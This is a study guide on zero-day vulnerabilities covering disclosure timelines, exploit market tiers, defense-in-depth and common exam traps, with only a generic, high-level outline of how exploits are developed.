Zero-day (computing) Study Guide

📖 Core Concepts Zero‑day vulnerability – a security flaw unknown to the developer and therefore without an available patch. Alive vs. dead vulnerability – alive: no public knowledge; dead: disclosed but not yet patched. Exploit – the code or method that leverages a vulnerability to gain unauthorized access or execute malicious actions. Defense‑in‑depth – layered security controls so an attacker must breach multiple barriers before succeeding. Disclosure timeline – the sequence from discovery (Day 0) → reporting → patch development → public disclosure. Market tiers – white‑market (bug‑bounty programs), gray‑market (government/intelligence), black‑market (organized crime). --- 📌 Must Remember Zero‑days are most dangerous because no patch exists; all systems running the vulnerable component remain at risk. Value curve: a zero‑day’s market price collapses once it becomes public knowledge (patchable). Primary buyers: governments (gray market) > organized crime (black market) > vendors/bug‑bounty programs (white market). Patch latency: months are typical; some vulnerabilities never receive a patch. Defense‑in‑depth mitigates zero‑day impact even when a patch is unavailable. Disclosure debate: secrecy enables offensive use; disclosure enables remediation. Half‑day attacks: exploits released shortly after a patch appears, targeting unpatched systems. --- 🔄 Key Processes Vulnerability Lifecycle Discovery (Day 0) → researcher finds flaw. Reporting → researcher notifies vendor/third‑party. Patch Development → vendor writes fix (weeks‑months). Public Disclosure → details released after patch or agreed‑upon delay (often 90 days). Dead status → vulnerability disclosed but still unpatched. Defense‑in‑Depth Implementation Identify critical assets. Apply preventive controls (e.g., MFA, least‑privilege). Deploy detection controls (e.g., EDR, anomaly monitoring). Establish response procedures (containment, forensics). Verify each layer works together; test for gaps. Zero‑Day Exploit Development (high‑level) Reconnaissance of target software. Identify code paths lacking bounds checks or sanitization. Craft payload that bypasses existing mitigations. Test against hardened environments. Package for delivery (phishing, drive‑by, supply‑chain). --- 🔍 Key Comparisons Zero‑day vs. Known vulnerability Zero‑day: no patch, unknown to vendor, high impact. Known: patch exists, mitigations available, lower stealth. White‑market vs. Gray‑market vs. Black‑market buyers White: rewards researchers, aims for disclosure. Gray: government/intelligence, may stockpile or use offensively. Black: criminal groups, prioritize immediate profit, often use “half‑day” attacks. Alive vs. Dead vulnerability Alive: no public knowledge, vendor has 0 days to respond. Dead: disclosed but unpatched; still exploitable until fix is deployed. --- ⚠️ Common Misunderstandings “Zero‑day = brand‑new software.” False – any mature product can contain an undisclosed flaw. “All organizations patch immediately.” False – patch rollout can be delayed by testing, compatibility, or resource constraints. “Only criminals buy zero‑days.” False – governments and intelligence agencies are the largest purchasers. “Stockpiling is always beneficial.” Misleading – it prolongs user exposure if the flaw stays secret. --- 🧠 Mental Models / Intuition “Undiscovered disease” analogy: a zero‑day is like a pathogen no one knows exists; treatment (patch) can’t be given until it’s identified. Layered cake model: each security layer is a cake tier; a zero‑day must cut through every tier to reach the “frosting” (critical asset). --- 🚩 Exceptions & Edge Cases Some zero‑days are unpatchable due to architectural limitations. Half‑day attacks exploit the window after a patch is released but before all systems update. Certain air‑gapped systems may be immune to network‑based zero‑day exploits but vulnerable to supply‑chain or removable‑media attacks. --- 📍 When to Use Which Patch‑first vs. defense‑in‑depth Use patches when a fix is available and can be deployed without breaking critical functions. Rely on defense‑in‑depth when no patch exists, when patch rollout is slow, or for high‑value assets. Disclosure vs. stockpiling Disclose if the vulnerability poses widespread risk and a timely patch is feasible. Stockpile only when the exploit offers unique strategic advantage and the risk of prolonged exposure is acceptable. --- 👀 Patterns to Recognize High‑profile breaches often mention “zero‑day” → expect limited public information and no patch at the time of attack. Value drop after public disclosure → if a vulnerability appears in a CVE database, its market price is negligible. Increased exploit difficulty → newer software with built‑in mitigations (ASLR, DEP) correlates with longer development timelines. --- 🗂️ Exam Traps Confusing “zero‑day” with “Day 0 of an attack.” The term refers to the vulnerability’s age, not the attack start date. Assuming every disclosed vulnerability is already patched. “Dead” status means disclosed but still unpatched; exploitation may continue. Choosing “stockpile” as the default policy. Exam may test knowledge that stockpiling can increase user exposure; not always the optimal choice. Mix‑up of market tiers – some questions may list “government agencies” under white‑market; remember they belong to the gray‑market. ---